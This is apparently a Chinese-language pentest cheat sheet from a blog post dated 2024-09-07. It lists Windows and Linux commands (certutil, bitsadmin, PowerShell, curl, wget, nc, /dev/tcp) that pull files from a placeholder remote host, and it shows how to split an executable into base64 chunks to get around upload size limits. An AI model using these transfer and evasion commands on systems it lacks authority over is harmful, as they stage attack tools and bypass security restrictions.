遠端下載上傳命令(繞過大小限制)

小新07發表於2024-09-07

遠端下載上傳命令(繞過大小限制)

python起http服務

  • python3 -m http.server 5003

python2 -m SimpleHTTPServer 5003

上傳時遇到限制上傳大小時:

編碼base64:certutil -encode yb.exe 1.txt

可以把1.txt拆成三個txt,分塊上傳後,再使用

copy c:\*txt c:\123.txt    //把c盤根目錄下的所有txt合併為123.txt
certutil -decode 123.txt 123.exe

window遠端下載檔案命令

  • <font style="color:rgb(0, 0, 0);">certutil -urlcache -split -f </font>https://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font>
  • bitsadmin /rawreturn /transfer getfile https://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font> D:\1.txt

注意bitsadmin 需要指定絕對路徑

  • cmd /c start /min msedge.exe http://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font> && timeout 5 && taskkill /f /t /im msedge.exe && C:/Users/%UserName%/Downloads/test.zip
  • <font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">curl http://xx.xx.xx.xx/test.zip -o c:\test.zip</font>
  • powershell -w "Invoke-WebRequest -Uri http://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font> -OutFile a.txt"
  • <font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">powershell -Command "Invoke-WebRequest -Uri '</font>http://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font>['](https://mirrors.aliyun.com/ubuntu/indices/override.artful-backports.main')<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);"> -OutFile 'test.txt'"</font>
  • <font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">powershell -w "Start-BitsTransfer -Source $url -Destination $output"</font>
  • <font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">powershell -Command "Start-BitsTransfer -Source 'url' -Destination 'test.txt'"</font>

linux遠端下載命令

  • 服務端命令:nc -lvvp 11111 < name 接收端命令:nc [服務端IP] 11111 > name_received
  • cat /dev/tcp/xxx.xxx.xxx/11111 >name
  • base64 -d /dev/tcp/xxx.xxx.xxx/11111 > name
  • wget http://xx.xx.xx.xx/test.zip
  • curl http://xx.xx.xx.xx/test.zip -o c:\test.zip

相關文章